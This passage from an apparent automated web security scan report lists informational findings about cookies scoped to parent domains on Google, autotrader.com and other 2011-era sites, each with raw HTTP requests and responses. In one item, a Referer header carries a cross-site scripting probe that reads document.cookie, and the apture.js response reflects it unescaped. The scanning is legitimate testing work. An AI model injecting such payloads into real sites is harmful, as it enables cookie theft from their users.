Cookie: bku=yQG99YBZ/AlFQiDm; bk=Sbr2orXnuT6sHNJo; bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:07:11 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=QbmOT/N77lGsHNJo; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56q2nQAWROde7lg4u4clJzY7iUu3LU9Gzp1EunRvUs3J4ueIQC9Sh4X9DoWa0qTLS7Og5iC3AF0Oy3iV/GvlaYQngpgFlprKsspfz2lFlzaKl9OqXOwTIDiTOQegNFmjLc6QcbYoxFdUTVcBVXp9G8dGOVoL9E0XJbHWqZdD2t6s9EGM9R0ArdEt9p4vKNd696Eh9dkH8VMwnK2TxXbTvlyuT4X1pgQ7kacw0enFHDYbJKD21lZ4K6d0poqh+XF05WS52GIrvQl6PyffVFO1C6o2ilkKe7XIXjZsqqK0SM6Qwi422fFavewF2YpLXH3xwYm2lqr5zxdM0UOkLF7X6sIlZZEBPfBRAxqbwR/2mRu4Et1rS7UlkZGd4lbqd8Ukoapr+tuA3BXUfErEsoHz+fsOEKj9bDXRIgs9dUYMd98GNMVx=; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJhE8VPQIwduNoKHRH/q9X1E//rByjLUyZJAAmmeLKT9hqTpZxBjAAYhPc6+/9L9bD6mSx==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArOx+/1pGbrySbrTqfIOPfK8rfh/KP8DjPa8jbbHzWZdNdS9oUhXGe+BEzp1nW6Lgu6Be/6+M9yBeztwkJFfQL9Y79pPy==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4Uz4aRQKhCTsPQAWNQjWMPNTv3eTYgkySfYyuYeJi5P+ZiIyw5UxrRxY88RL49Wwmq1hz9d63VjQ==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 25-Jan-2011 21:07:11 GMT; path=/; domain=.bluekai.com
BK-Server: 45b2
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.160. http://translate.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=6837c8c340aa3ef0:TM=1295884954:LM=1295884954:S=IxvWEj2Jnkrx4IAL; expires=Wed, 23-Jan-2013 16:02:34 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:34 GMT
Expires: Mon, 24 Jan 2011 16:02:34 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=6837c8c340aa3ef0:TM=1295884954:LM=1295884954:S=IxvWEj2Jnkrx4IAL; expires=Wed, 23-Jan-2013 16:02:34 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

13.161. http://translate.google.com/translate_t

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=58e54bef485bd12c:TM=1295884957:LM=1295884957:S=BeWfOb0gwP1Q71Gx; expires=Wed, 23-Jan-2013 16:02:37 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:37 GMT
Expires: Mon, 24 Jan 2011 16:02:37 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=58e54bef485bd12c:TM=1295884957:LM=1295884957:S=BeWfOb0gwP1Q71Gx; expires=Wed, 23-Jan-2013 16:02:37 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

13.162. http://ugg.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ugg.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tm_identity=829c716c3f5e23f491631347aa8b9682; expires=Tue, 01-Feb-2011 14:02:16 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ugg.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:02:16 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=829c716c3f5e23f491631347aa8b9682; expires=Tue, 01-Feb-2011 14:02:16 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0046799182891846
X-Served-In: 1.2870261669159
X-Served-By: h03
Content-Length: 40013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

13.163. http://video.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=80bba0dfa9870dce:TM=1295884962:LM=1295884962:S=KNIAhHHGtNDbKn6t; expires=Wed, 23-Jan-2013 16:02:42 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:02:42 GMT
Expires: Mon, 24 Jan 2011 16:02:42 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=80bba0dfa9870dce:TM=1295884962:LM=1295884962:S=KNIAhHHGtNDbKn6t; expires=Wed, 23-Jan-2013 16:02:42 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...

13.164. http://video.google.com/videosearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /videosearch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=894a182096f23f60:TM=1295964142:LM=1295964142:S=7DudISgZilhHzEc6; expires=Thu, 24-Jan-2013 14:02:22 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videosearch HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
Location: http://video.google.com/
Set-Cookie: PREF=ID=894a182096f23f60:TM=1295964142:LM=1295964142:S=7DudISgZilhHzEc6; expires=Thu, 24-Jan-2013 14:02:22 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 14:02:22 GMT
Server: VSFE_1.0
Content-Length: 221
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://video.google.com/">here</
...[SNIP]...

13.165. http://www.apture.com/js/apture.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • AC=nbrlsqWMpk; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/apture.js?siteToken=5rLcDWk HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Expires: Mon, 24 Jan 2011 21:11:11 GMT
Last-Modified: Mon, 24 Jan 2011 21:11:11 GMT
Etag: "4ad7d91e6131ca80d32f15ef4593339c"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=nbrlsqWMpk; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 1604
Date: Mon, 24 Jan 2011 21:11:11 GMT
Connection: close


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5
...[SNIP]...

13.166. http://www.automotive.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.automotive.com
Path:   /x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • UserPuid=2325714041713319967; domain=automotive.com; expires=Mon, 24-Jan-2061 16:04:18 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.automotive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 24 Jan 2011 16:04:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.automotive.com/x22/index.html
Set-Cookie: ASP.NET_SessionId=ru5vzmel1nvlrbjo404j0i55; path=/; HttpOnly
Set-Cookie: UserPuid=2325714041713319967; domain=automotive.com; expires=Mon, 24-Jan-2061 16:04:18 GMT; path=/
Cache-Control: private
Content-Length: 0


13.167. http://www.autotrader.com/fyc/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /fyc/index.jsp/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=89BF6C3250E2E334; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885067966444; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fyc/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:27 GMT
Server: Apache
Set-Cookie: v1st=89BF6C3250E2E334; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885067966444; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1351147530.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.168. http://www.autotrader.com/hornav/trader/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /hornav/trader/index.jsp/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=5789AE528FD93066; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885068472993; path=/; expires=Sat, 03-Jan-15 16:04:28 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hornav/trader/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:28 GMT
Server: Apache
Set-Cookie: v1st=5789AE528FD93066; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885068472993; path=/; expires=Sat, 03-Jan-15 16:04:28 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1552474122.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.169. http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0001_nocount.asis

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=7569AE0D6B39E1B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767490185; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0001_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=7569AE0D6B39E1B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767490185; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1737023498.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.170. http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0002_nocount.asis

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=BF3F7217996B123A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767492259; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0002_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=BF3F7217996B123A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767492259; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1317593098.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.171. http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0005_nocount.asis

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=1AA3D7F874709C04; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767486770; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0005_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=1AA3D7F874709C04; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767486770; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1653137418.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.172. http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0006_nocount.asis

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=4BE5B3481EBAD751; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767492827; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0006_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=4BE5B3481EBAD751; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767492827; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=2022236170.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.173. http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0009_nocount.asis

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=DE05B78BAE6BA143; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767489238; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0009_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=DE05B78BAE6BA143; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767489238; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=2575884298.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.174. http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0016_nocount.asis

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • v1st=F295814A75AF51AA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767489157; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0016_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=F295814A75AF51AA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767489157; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
